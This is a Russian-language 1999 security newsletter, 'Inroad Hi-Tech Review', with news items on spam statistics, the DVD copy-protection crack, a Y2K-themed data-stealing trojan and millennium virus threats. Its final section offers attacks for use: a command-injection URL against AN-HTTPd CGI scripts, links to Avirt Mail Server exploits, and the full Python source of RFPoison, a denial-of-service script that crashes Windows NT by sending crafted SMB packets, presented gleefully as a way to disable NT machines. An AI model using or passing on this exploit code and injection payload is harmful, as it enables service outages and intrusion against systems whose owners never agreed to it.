Отправляет email-рассылки с помощью сервиса Sendsay

Inroad Hi - Tech Review

  Все выпуски  

Служба Рассылок Городского Кота


Служба Рассылок Городского Кота

Обзор высоких технологий в области  защиты и взлома
/ новости / обзор рынка и комментарии к нему / 05.11.99 /

http://www.inroad.kiev.ua
ac@istrada.net.ua

Спам: врага надо знать в лицо

По данным последнего исследования Центра переработки спама (Spam Recycling Center), дочерней компании ChooseYourMail, 30% всей непрошеной почты имеет отношение к порнографии. В 29,6% спамерских посланий речь идет о способах быстро разбогатеть. 12,5% спамеров предлагают поделиться опытом рассылки непрошеных писем: продают списки электронных адресов или релевантное программное обеспечение.

В 23,5% спама предлагаются прямые продажи товаров и услуг. В этой категории непрошеной почты первое место занимает продажа медикаментов и других относящихся к здравоохранению товаров - 9,9% всех писем с предложением прямых продаж. 21,4% всех продаваемых таким образом медикаментов составляют "Виагра" и ее аналоги.

Исследование проводилось на основе базы данных, содержащей 98948 непрошеных электронных сообщений, собранных в период с 1 мая по 1 июля сего года. Около 2,5 тысяч писем из всей коллекции Центра содержат компьютерные вирусы. Чуть более 17 тысяч спамеров из коллекции - клиенты AOL, почти 5 тысяч имеют почтовый адрес на Hotmail.com

Центр переработки спама - организация, основанная совместно компанией ChooseYourMail, Коалицией против непрошеной коммерческой почты (CAUCE), Форумом против безответственных и неэтичных электронных писем (FREE) и организацией SAFEeps. Основная задача Центра - предоставление пользователям адекватной информации о спаме и способах борьбы с ним. Кроме того, центр собирает образцы спама с тем, чтобы на основе полной картины разработать эффективное законодательство в отношении этого явления.

Copyright (C) Lenta.ru 


Норвежские хакеры взломали DVD

Система шифрования, используемая для защиты от копирования видеоинформации на DVD (digital video disc), недавно была взломана. Кинопроизводители восприняли эту новость как сильнейший удар, поскольку разработка этой системы заняла несколько лет, прежде чем DVD были выпущены на рынок.

Все получилось из-за того, поясняет Wired News, что существует масса программных продуктов для проигрывания DVD под Windows, но ни одного под Linux. Группа норвежских программистов решила выяснить, как работают DVD-плейеры под Windows, чтобы написать аналогичную утилиту под Linux.

Разумеется, во всех плейерах ключ, используемый при дешифровке ключа DVD, был зашифрован - кроме единственного плейера XingDVD, выпущенного дочерней компанией RealNetworks под названием Xing Technologies. В XingDVD дешифровальный ключ зашифрован не был - простая случайность. На основе этого ключа была написала утилита, позволяющая удалять препятствующий копированию фильма код с DVD. Утилита опубликована в Сети 1 ноября.

Разумеется, это далеко не первый случай успешного взлома DVD, но один из наиболее показательных и наиболее чувствительных для производителей DVD.

Copyright (C) Lenta.ru


Вирус "решает" проблему 2000

Впервые вирус был распространен в США в сентябре и сейчас достиг Японии. Он рассылает себя по е-mail под заголовком "Предупреждение об опасности от представительства Microsoft в Японии". К письму присоединен файл server.exe, который "решает проблему 2000", воруя важные данные о соединении пользователя и отсылая их через Интернет автору. Естественно, что Microsoft не имеет никакого отношения к этому инциденту хотя бы потому, что никогда не рассылает программное обеспечение по e-mail.

Copyright (C) РосБизнесКонсалтинг


Что год грядущий нам готовит?

В разговорах о грядущих новогодних праздниках и наступлении нового тысячелетия все чаще упоминаются компьютеры. И в таких случая обычно говорят об уже всем порядком поднадоевшей проблеме 2000, которую многие вообще считают искусственно раздутой.

Но оказывается, это не единственная возможная опасность, связанная с Новым Годом. ФБР и другие правоохранительные организации зарегистрировали более 30000 угроз от хакеров и вирмейкеров, обещающих отметить начало нового тысячелетия ударным трудом на своем поприще. Руководитель научно-исследовательских работ в известной консалтинговой фирме Gartner Group Lou Marcoccio считает, что большинство этих угроз безосновательны, однако, в случае одновременного появления 5 или 10 вирусов возможен выход из строя многих компьютерных систем. Дело в том, что в случае обнаружения нового вируса компании-производители антивирусного ПО обычно оперативно разрабатывают соответствующую вакцину , но если вирусов будет много, они окажутся просто неспособны сделать это своевременно. А такой вариант развития событий грозит простоями техники, что несомненно выльется в колоссальные убытки. Некоторые вирусы могут просто дремать на винчестерах пользователей и активизироваться только в определенное время. Прецеденты известны.

Еще свежа в нашей памяти Пятница 13 или совсем свежий пример с Чернобылем, который ко всему прочему был еще и первым вирусом, научившимся портить аппаратное обеспечение, перезаписывая флэш-память на материнских платах. Согласитесь, 1 января 2000 года представляется очень привлекательной датой для таких шуток. Причем многих вирмейкеров даже не особо пугает перспектива быть арестованными, они просто хотят прославиться невзирая на средства. Вот и радуйся после этого Новому Году...

Copyright (C) Компьютерра



НОВЫЕ CGI BUGS, ДЕКОМПИЛИРОВАННЫЙ ЭКСПЛОИТ ДЛЯ WINNT

Все как всегда - поставляемые в комплекте cgi-скрипты ...

... как обычно подвели производителя. На этот раз им оказался веб-сервер AN-HTTPd 1.20b.

С помощью скриптов:

/cgi-bin/test.bat
/cgi-bin/input.bat
/cgi-bin/input2.bat
/ssi/envout.bat


вы можете удаленно выполнить команду на сервере. Например /cgi-bin/test.bat?|dir..\..\windows

В связи с этим мы модифицировали файл exp.dat [скачать], который позволит нашему сканнеру найти и эти уязвимости.

Появился эксплоит для почтового сервера

Avirt Mail Server 3.3a или 3.5. Сначала было обнаружено, что при передаче программе значения PASS, равному 856 символам, программа падает окончательно и надолго.

Ниже вы можете взять программы для использования этой уязвимости.

Эксплоит для версии 3.3а
http://www.ussrback.com/avirtro/

Атака на отказ для версии 3.5
http://www.ussrback.com/avirtro/

Эксплоит для версии 3.5
http://www.beavuh.org


С удовлетворением сообщаем что, несмотря на попытки r.f.p. скрыть исходники недавно выпущенной им D.O.S. - атаки на

Win-машины (RFPoison.exe), программа была дизассемблирована и переведена на язык Python. Теперь владельцы *nix-систем также могут насладиться выведением из строя Win NT.

#!/usr/bin/env python
#
# Services.exe DoS
# hard work done by: rfp@wiretrip.net
# Python hack by: nas@adler.dynodns.net
#
# This only seems to work on NT.  Also, it may have to
# be run multiple times
# before SERVICES.EXE will die.  Improvements welcome.
#
# Usage: rfpoison.py 

import string
import struct
from socket import *
import sys

def a2b(s):
    bytes = map(lambda x: string.atoi(x, 16), string.split(s))
    data = string.join(map(chr, bytes), '')
    return data

def b2a(s):
    bytes = map(lambda x: '%.2x' % x, map(ord, s))
    return string.join(bytes, ' ')

# NBSS session request
nbss_session = a2b("""
    81 00  00 48 20 43 4b 46 44 45
    4e 45 43 46 44 45 46 46  43 46 47 45 46 46 43 43
    41 43 41 43 41 43 41 43  41 43 41 00 20 45 48 45
    42 46 45 45 46 45 4c 45  46 45 46 46 41 45 46 46
    43 43 41 43 41 43 41 43  41 43 41 41 41 00 00 00
    00 00
    """)

# SMB stuff
crud = (
    # SMBnegprot Request
    """
    ff 53 4d 42 72 00
    00 00 00 08 01 00 00 00  00 00 00 00 00 00 00 00
    00 00 00 00 f4 01 00 00  01 00 00 81 00 02 50 43
    20 4e 45 54 57 4f 52 4b  20 50 52 4f 47 52 41 4d
    20 31 2e 30 00 02 4d 49  43 52 4f 53 4f 46 54 20
    4e 45 54 57 4f 52 4b 53  20 31 2e 30 33 00 02 4d
    49 43 52 4f 53 4f 46 54  20 4e 45 54 57 4f 52 4b
    53 20 33 2e 30 00 02 4c  41 4e 4d 41 4e 31 2e 30
    00 02 4c 4d 31 2e 32 58  30 30 32 00 02 53 61 6d
    62 61 00 02 4e 54 20 4c  41 4e 4d 41 4e 20 31 2e
    30 00 02 4e 54 20 4c 4d  20 30 2e 31 32 00
    """,

    # SMBsessetupX Request
    """
    ff 53 4d 42 73 00
    00 00 00 08 01 00 00 00  00 00 00 00 00 00 00 00
    00 00 00 00 f4 01 00 00  01 00 0d ff 00 00 00 ff
    ff 02 00 f4 01 00 00 00  00 01 00 00 00 00 00 00
    00 00 00 00 00 17 00 00  00 57 4f 52 4b 47 52 4f
    55 50 00 55 6e 69 78 00  53 61 6d 62 61 00
    """,

    # SMBtconX Request
    """
    ff 53 4d 42 75 00
    00 00 00 08 01 00 00 00  00 00 00 00 00 00 00 00
    00 00 00 00 f4 01 00 08  01 00 04 ff 00 00 00 00
    00 01 00 17 00 00 5c 5c  2a 53 4d 42 53 45 52 56
    45 52 5c 49 50 43 24 00  49 50 43 00
    """,

    # SMBntcreateX request
    """
    ff 53 4d 42 a2 00
    00 00 00 08 01 00 00 00  00 00 00 00 00 00 00 00
    00 00 00 08 f4 01 00 08  01 00 18 ff 00 00 00 00
    07 00 06 00 00 00 00 00  00 00 9f 01 02 00 00 00
    00 00 00 00 00 00 00 00  00 00 03 00 00 00 01 00
    00 00 00 00 00 00 02 00  00 00 00 08 00 5c 73 72
    76 73 76 63 00
    """,

    # SMBtrans Request
    """
    ff 53 4d 42 25 00
    00 00 00 08 01 00 00 00  00 00 00 00 00 00 00 00
    00 00 00 08 f4 01 00 08  01 00 10 00 00 48 00 00
    00 48 00 00 00 00 00 00  00 00 00 00 00 00 00 4c
    00 48 00 4c 00 02 00 26  00 00 08 51 00 5c 50 49
    50 45 5c 00 00 00 05 00  0b 00 10 00 00 00 48 00
    00 00 01 00 00 00 30 16  30 16 00 00 00 00 01 00
    00 00 00 00 01 00 c8 4f  32 4b 70 16 d3 01 12 78
    5a 47 bf 6e e1 88 03 00  00 00 04 5d 88 8a eb 1c
    c9 11 9f e8 08 00 2b 10  48 60 02 00 00 00
    """,

    # SMBtrans Request
    """
    ff 53 4d 42 25 00
    00 00 00 08 01 00 00 00  00 00 00 00 00 00 00 00
    00 00 00 08 f4 01 00 08  01 00 10 00 00 58 00 00
    00 58 00 00 00 00 00 00  00 00 00 00 00 00 00 4c
    00 58 00 4c 00 02 00 26  00 00 08 61 00 5c 50 49
    50 45 5c 00 00 00 05 00  00 03 10 00 00 00 58 00
    00 00 02 00 00 00 48 00  00 00 00 00 0f 00 01 00
    00 00 0d 00 00 00 00 00  00 00 0d 00 00 00 5c 00
    5c 00 2a 00 53 00 4d 00  42 00 53 00 45 00 52 00
    56 00 45 00 52 00 00 00  00 00 01 00 00 00 01 00
    00 00 00 00 00 00 ff ff  ff ff 00 00 00 00
    """
)
crud = map(a2b, crud)


def smb_send(sock, data, type=0, flags=0):
    d = struct.pack('!BBH', type, flags, len(data))
    #print 'send:', b2a(d+data)
    sock.send(d+data)

def smb_recv(sock):
    s = sock.recv(4)
    assert(len(s) == 4)
    type, flags, length = struct.unpack('!BBH', s)
    data = sock.recv(length)
    assert(len(data) == length)
    #print 'recv:', b2a(s+data)
    return type, flags, data

def nbss_send(sock, data):
    sock.send(data)

def nbss_recv(sock):
    s =  sock.recv(4)
    assert(len(s) == 4)
    return s

def main(host, port=139):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(host, port)
    nbss_send(s, nbss_session)
    nbss_recv(s)
    for msg in crud[:-1]:
        smb_send(s, msg)
        smb_recv(s)
    smb_send(s, crud[-1]) # no response to this
    s.close()

if __name__ == '__main__':
    print 'Sending poison...',
    main(sys.argv[1])
    print 'done.'

Надеемся, что вскоре появится программа, не только перезагружающая систему, но и позволяющая выполнять команды.
- void rb()

Copyright (C) Team Void

Журнал PC Club


Обновлен сервер "Проекта - Inroad"

Обновления раздела
Bugs {Проект - Alliance}

Архив новостей
Последние новости за два месяца

Беспроводный доступ в Интернет
предоставлен  фирмой  InterStrada

http://www.citycat.ru/ ═══════ E-mail: citycat@citycat.ru

В избранное